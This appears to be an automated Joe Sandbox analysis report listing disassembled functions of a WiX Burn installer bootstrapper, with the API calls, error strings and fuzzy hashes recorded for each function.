Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CompareHeapString$AllocateProcess
String ID: application$apuputil.cpp$http://appsyndication.org/2006/appsyn$type
API String ID: 2664528157-4206478990
Opcode ID: 237ac103793e2e29316c0b020ec84dda2d5e385e94a539795e461f47d1ebcd13
Instruction ID: 041203f522839a52730268de424fdd0d87e2a1f2c424e33000391268b5cccabe
Opcode Fuzzy Hash: 237ac103793e2e29316c0b020ec84dda2d5e385e94a539795e461f47d1ebcd13
Instruction Fuzzy Hash: 6451AE31A04716EBEBA09F54CC86F1A77A5FB04760F208218F9A5EB2D1DB74E9808B54

Function 0080635A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 008063B7
DeleteFileW.KERNEL32(00000000,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 008064AE
CloseHandle.KERNEL32(000000FF,00000000,00000000,?,?,00000078,000000FF,00000000,?,?,?,00000078,000000FF,?,?,00000078), ref: 008064BD

Strings

Burn, xrefs: 008063A6
DownloadTimeout, xrefs: 008063F0
dlutil.cpp, xrefs: 008063DB
WiX\Burn, xrefs: 008063F5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseDeleteErrorFileHandleLast
String ID: Burn$DownloadTimeout$WiX\Burn$dlutil.cpp
API String ID: 3522763407-1704223933
Opcode ID: 076c8e5591fccb6fa95f74488edd074747da4c8afb596495fde609ffbde55fa8
Instruction ID: 62761ee40618bbe941f2ac5237d6f4bed6a9a87304a5fc8edb5cc4eb4701b1df
Opcode Fuzzy Hash: 076c8e5591fccb6fa95f74488edd074747da4c8afb596495fde609ffbde55fa8
Instruction Fuzzy Hash: 9F514972D00619BBDF529FA4CC45EEFBBB8FF08710F018165FA14E6190E7348A619BA1

Function 007D9080 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 007D910E

Part of subcall function 00805587: GetLastError.KERNEL32(?,?,007D9133,?,00000003,00000000,?), ref: 008055A6

_memcmp.LIBVCRUNTIME ref: 007D9148
GetLastError.KERNEL32 ref: 007D91C2

Strings

Failed to find expected public key in certificate chain., xrefs: 007D9183
Failed to get certificate public key identifier., xrefs: 007D91F0
Failed to read certificate thumbprint., xrefs: 007D91B6
cache.cpp, xrefs: 007D91E6

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast_memcmp
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 3428363238-3408201827
Opcode ID: b9120f4b52fe8dff53d309af6e709cba9fe3adf340777795e8856dcda38bfaa4
Instruction ID: 73edfd7d5d2a5a9cb036a5f4a804da5d39fe0e36a82954382b48fb0af05cd370
Opcode Fuzzy Hash: b9120f4b52fe8dff53d309af6e709cba9fe3adf340777795e8856dcda38bfaa4
Instruction Fuzzy Hash: F1415171E0021AAFDB10DBA9C845EAAB7F9FF08710F01412AFA15E7351D679ED44CBA4

Function 007D0419 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 133registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 007D054A
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000001,00000000,?,?,00020006,00000000,?,?,00000000,?), ref: 007D0559

Part of subcall function 00800AD5: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D0491,?,00000000,00020006), ref: 00800AFA

Strings

%ls.RebootRequired, xrefs: 007D0467
Failed to open registration key., xrefs: 007D0591
Failed to delete registration key: %ls, xrefs: 007D04F8
Failed to update resume mode., xrefs: 007D052E
Failed to write volatile reboot required registry key., xrefs: 007D0495

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close$Create
String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
API String ID: 359002179-2517785395
Opcode ID: a0c76f94d891166b3af97e61973adf8bae9db849e4116cd36359f07b0c65e2ab
Instruction ID: 5c1c6b218282ea358bb7f6410b319f80e9a9f5df7306c5e328554441470af734
Opcode Fuzzy Hash: a0c76f94d891166b3af97e61973adf8bae9db849e4116cd36359f07b0c65e2ab
Instruction Fuzzy Hash: 96419032900618FBDF12AFA4EC06FAF7BB9FF40310F10446AF945A1251D7799A60DB91

Function 007CF69D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF7CD
RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 007CF7DA

Strings

%ls.RebootRequired, xrefs: 007CF6BA
Failed to open registration key., xrefs: 007CF736
Failed to read Resume value., xrefs: 007CF763
Failed to format pending restart registry key to read., xrefs: 007CF6D1
Resume, xrefs: 007CF741

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Close
String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
API String ID: 3535843008-3890505273
Opcode ID: 89720c81437c51f674ca3f2926ec732508d141895012ac16e1476ee9d26c9715
Instruction ID: 1ff739aba4e5214f488e2f71d2312be9697f0fbb485e7964bda3b62db70adfcf
Opcode Fuzzy Hash: 89720c81437c51f674ca3f2926ec732508d141895012ac16e1476ee9d26c9715
Instruction Fuzzy Hash: C9415D36900118EFCB119F98C981FEDBBB6FF11310FA5817EE914AB250C37A9E509B90

Function 007DA7FA Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 111COMMON

Download Yara Rule

Strings

Failed to set last source., xrefs: 007DA8EA
Failed to trim source folder., xrefs: 007DA88F
Failed to determine length of relative path., xrefs: 007DA847
WixBundleLastUsedSource, xrefs: 007DA899, 007DA89F, 007DA8DB
Failed to determine length of source path., xrefs: 007DA82A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID:
String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
API String ID: 0-660234312
Opcode ID: ab6fb6ba96bf9498e610191979e8b9919c26daf4669fb0b48713006fe852ec18
Instruction ID: dafb71f6f6e0efcc8fd158c9d7ac435b5c23c59d4e2437dab7b45caa33f5e67b
Opcode Fuzzy Hash: ab6fb6ba96bf9498e610191979e8b9919c26daf4669fb0b48713006fe852ec18
Instruction Fuzzy Hash: 3D319531D00219BBDF229A94CC45EAE7B79FF01720F114266F920E62D1EA399E91A751

Function 007ED677 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 106comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00820A84,00000000,00000017,00820A94,?,?,00000000,00000000,?,?,?,?,?,007EDCAE,00000000,00000000), ref: 007ED6AF

Strings

Failed to set notification flags for BITS job., xrefs: 007ED701
Failed to create BITS job., xrefs: 007ED6E9
Failed to set progress timeout., xrefs: 007ED719
Failed to set BITS job to foreground., xrefs: 007ED730
WixBurn, xrefs: 007ED6DA
Failed to create IBackgroundCopyManager., xrefs: 007ED6BB

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CreateInstance
String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
API String ID: 542301482-468763447
Opcode ID: 75d038f9d2c23dbc7aea449a1445fd96c5c0d52a46b5076296d258203261747b
Instruction ID: eeb7cb3b0b67844f38451cb3a042b35a926bc25b53d30462edb4000776d706d7
Opcode Fuzzy Hash: 75d038f9d2c23dbc7aea449a1445fd96c5c0d52a46b5076296d258203261747b
Instruction Fuzzy Hash: 8931A331B41266AFDB24CFA9C845E7FBBB4FF4C710B100169E906EB351DA78AC418B91

Function 00805C68 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000004,00000000,00000004,00000080,00000000,00000000,?,?,?,?,?,WiX\Burn,DownloadTimeout,00000078), ref: 00805CB2
GetLastError.KERNEL32 ref: 00805CBF
ReadFile.KERNEL32(00000000,00000008,00000008,?,00000000), ref: 00805D06
CloseHandle.KERNEL32(00000000,dlutil.cpp,000000C8,00000000), ref: 00805D6E

Strings

%ls.R, xrefs: 00805C86
dlutil.cpp, xrefs: 00805CE3, 00805D5E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: File$CloseCreateErrorHandleLastRead
String ID: %ls.R$dlutil.cpp
API String ID: 2136311172-657863730
Opcode ID: 512f3d4b3935e0b3d2e64fc0963065bc16a7cac87f0d35895879e15e70659c80
Instruction ID: 66ae0c2a30581553244f2244fe2a6bd30747c2ca1e28dde5fe1cbc6956f3244e
Opcode Fuzzy Hash: 512f3d4b3935e0b3d2e64fc0963065bc16a7cac87f0d35895879e15e70659c80
Instruction Fuzzy Hash: E031C771A40614ABEB608B68CC49BAB77E8FF05721F11422AFE15EB2D0D7745D018BB1

Function 007ED12C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,762330B0,00000000,?,?,?,?,007ED439,?), ref: 007ED145
ReleaseMutex.KERNEL32(?,?,?,?,007ED439,?), ref: 007ED161
WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED1A4
ReleaseMutex.KERNEL32(?), ref: 007ED1BB
SetEvent.KERNEL32(?), ref: 007ED1C4

Strings

Failed to send files in use message from netfx chainer., xrefs: 007ED20A
Failed to get message from netfx chainer., xrefs: 007ED1E5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: MutexObjectReleaseSingleWait$Event
String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.
API String ID: 2608678126-3424578679
Opcode ID: ce28beccbee4f7798c1ac4a39b61b83c8da39dc76b35c0c5a7f2bbde40c4e7ac
Instruction ID: 6f1ca52056d6e85ffc1ab631b9b9186423badf116f9ac9dc18f373900bf993b1
Opcode Fuzzy Hash: ce28beccbee4f7798c1ac4a39b61b83c8da39dc76b35c0c5a7f2bbde40c4e7ac
Instruction Fuzzy Hash: 6231E931900659BFCB229F95DC08EAFBBB9FF48320F108665F525E6261C735DE409B90

Function 0080082D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 89processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,00000000), ref: 0080089A
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 008008A4
CloseHandle.KERNEL32(?,?,?,?,?,00000000,00000000,00000000), ref: 008008ED
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 008008FA

Strings

D, xrefs: 00800882
"%ls" %ls, xrefs: 00800863
procutil.cpp, xrefs: 008008C8

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess
String ID: "%ls" %ls$D$procutil.cpp
API String ID: 161867955-2732225242
Opcode ID: d5706a18093d3a6c2861948e35dbf252096af11bcb89440a35bbaa281df89f35
Instruction ID: fbccb4f915d93a360bf673167c529d205240848fc2cacd7c6831b74618189ac3
Opcode Fuzzy Hash: d5706a18093d3a6c2861948e35dbf252096af11bcb89440a35bbaa281df89f35
Instruction Fuzzy Hash: 0F21277190021EAFDB50AFE4CD40AAEBBB9FF04314F10413AEA05F62A1D7749E409BA1

Function 007C9A6D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 74COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9A86
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,?,007CA7A9,00000100,000002C0,000002C0,00000100), ref: 007C9AA6
GetLastError.KERNEL32(?,007CA7A9,00000100,000002C0,000002C0,00000100), ref: 007C9AB1

Strings

Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 007C9B1C
Failed to set directory search path variable., xrefs: 007C9AE1
Failed to format variable string., xrefs: 007C9A91
Failed while searching directory search: %ls, for path: %ls, xrefs: 007C9B06

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
API String ID: 1811509786-2966038646
Opcode ID: 671b9eb7760a0c291d6ac17cfe49dacb36ea41fae1c3b71264b12c0b538b7f0d
Instruction ID: bba8c7b49bd9ca416b32857e3cbc91e43c711f12ca7fdb36ff6d35885bd321b3
Opcode Fuzzy Hash: 671b9eb7760a0c291d6ac17cfe49dacb36ea41fae1c3b71264b12c0b538b7f0d
Instruction Fuzzy Hash: 3511EB32940525FBCB926A989D0AF9EBB65FF14720F21412DFE20B61A0D72E5D20E6D1

Function 007C9C39 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 71COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9C52
GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,000002C0,?,007CA781,00000100,000002C0,000002C0,?,000002C0,00000100), ref: 007C9C72
GetLastError.KERNEL32(?,007CA781,00000100,000002C0,000002C0,?,000002C0,00000100,000002C0,000002C0,00000100), ref: 007C9C7D

Strings

Failed to set variable to file search path., xrefs: 007C9CD4
File search: %ls, did not find path: %ls, xrefs: 007C9CE0
Failed while searching file search: %ls, for path: %ls, xrefs: 007C9CAA
Failed to format variable string., xrefs: 007C9C5D

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AttributesErrorFileLastOpen@16
String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
API String ID: 1811509786-3425311760
Opcode ID: 570bedf633827b2eb47c4682f4c07db00df052e261bc48d62c57795b5bae9ea6
Instruction ID: 16a871418cd352e3eae4e1620cb9792367b5d27a5d583528ddddaad872f82268
Opcode Fuzzy Hash: 570bedf633827b2eb47c4682f4c07db00df052e261bc48d62c57795b5bae9ea6
Instruction Fuzzy Hash: 8211BE33940124B7CBA166A48D4AF9DB765FF10720F20411DFD10B61A1E7299E10A7E5

Function 007D444C Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

_memcpy_s.LIBCMT ref: 007D449E
_memcpy_s.LIBCMT ref: 007D44B1
_memcpy_s.LIBCMT ref: 007D44CC

Strings

feclient.dll, xrefs: 007D4466, 007D449C
pipe.cpp, xrefs: 007D447D
@G|, xrefs: 007D4454
Failed to allocate memory for message., xrefs: 007D4487

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: _memcpy_s$Heap$AllocateProcess
String ID: @G|$Failed to allocate memory for message.$feclient.dll$pipe.cpp
API String ID: 886498622-206609805
Opcode ID: fc13ead18f3333c785006e12a41ce815eb0c2ea7e3f568360b4b15501cf382d9
Instruction ID: 5875d7451b0febd91dff55320468491f26e4c6c4fb1f02379b2803846c6ee475
Opcode Fuzzy Hash: fc13ead18f3333c785006e12a41ce815eb0c2ea7e3f568360b4b15501cf382d9
Instruction Fuzzy Hash: 0A1142B2501359ABDB019F55CC86EDBB3ACEF14714F04452AFA1197241EB74DA5087E1

Function 007DCCF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 53synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000493E0,00000000,?,?,007DD134,00000000,?,?,007DC59C,00000001,?,?,?,?,?), ref: 007DCD06
GetLastError.KERNEL32(?,?,007DD134,00000000,?,?,007DC59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCD10
GetExitCodeThread.KERNEL32(00000001,?,?,?,007DD134,00000000,?,?,007DC59C,00000001,?,?,?,?,?,00000000), ref: 007DCD4C
GetLastError.KERNEL32(?,?,007DD134,00000000,?,?,007DC59C,00000001,?,?,?,?,?,00000000,00000000,?), ref: 007DCD56

Strings

Failed to get cache thread exit code., xrefs: 007DCD84
Failed to wait for cache thread to terminate., xrefs: 007DCD3E
elevation.cpp, xrefs: 007DCD34, 007DCD7A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
API String ID: 3686190907-1954264426
Opcode ID: 719ae5210be67706d262f60ddb1f61014fae8ca58e33e9d4be228f03f5ebc088
Instruction ID: 464f7b5358351b1fa7008ed5e1f80fc68a18c12318df29ca426cfb648917e351
Opcode Fuzzy Hash: 719ae5210be67706d262f60ddb1f61014fae8ca58e33e9d4be228f03f5ebc088
Instruction Fuzzy Hash: 1B012872B40734BBE7606BB99D05B9B7EEDFF04790F01412AFD15E6290E7588E0081E5

Function 007D67B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 52synchronizationthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,007D6CFB,@G|,?,00000000,?,00000000,00000001), ref: 007D67BD
GetLastError.KERNEL32(?,007D6CFB,@G|,?,00000000,?,00000000,00000001), ref: 007D67C7
GetExitCodeThread.KERNEL32(00000001,00000000,?,007D6CFB,@G|,?,00000000,?,00000000,00000001), ref: 007D6806
GetLastError.KERNEL32(?,007D6CFB,@G|,?,00000000,?,00000000,00000001), ref: 007D6810

Strings

Failed to get cache thread exit code., xrefs: 007D6841
Failed to wait for cache thread to terminate., xrefs: 007D67F8
core.cpp, xrefs: 007D67EB, 007D6834

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLast$CodeExitObjectSingleThreadWait
String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
API String ID: 3686190907-2546940223
Opcode ID: 28ee0fa9e52c4235184ce600500acd41a3a7e0879bcb5e9662b06df91e93fedf
Instruction ID: ca8a513464bdb6ebdcb53f906dd87ed73ba15d9b3a728b740be17c6e52fbc46e
Opcode Fuzzy Hash: 28ee0fa9e52c4235184ce600500acd41a3a7e0879bcb5e9662b06df91e93fedf
Instruction Fuzzy Hash: 66016D70740304FBEB08AB65DD56BBE76E9FF00710F10412EB816D52E0EB399E50A618

Function 007DF586 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007DF59B
LeaveCriticalSection.KERNEL32(?), ref: 007DF6A8

Strings

Failed to set source path for container., xrefs: 007DF68D
user is active, cannot change user state., xrefs: 007DF5B5
Failed to set source path for payload., xrefs: 007DF637
UX requested unknown payload with id: %ls, xrefs: 007DF607
UX denied while trying to set source on embedded payload: %ls, xrefs: 007DF61D
UX requested unknown container with id: %ls, xrefs: 007DF667

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: user is active, cannot change user state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
API String ID: 3168844106-4121889706
Opcode ID: 10a16149f71493863e54bfa97eb8e0b14044bf3b73cbbfeee2d556fa96ef99e1
Instruction ID: 8250887f81530ccb99bc9dd60d7d02f5fbfd7a57295426270a4a3dc0d31c6094
Opcode Fuzzy Hash: 10a16149f71493863e54bfa97eb8e0b14044bf3b73cbbfeee2d556fa96ef99e1
Instruction Fuzzy Hash: B331F272A41615FB8B219B58CC06EAA73BCEF54720B15806BFC06EB751DB7CED4087A1

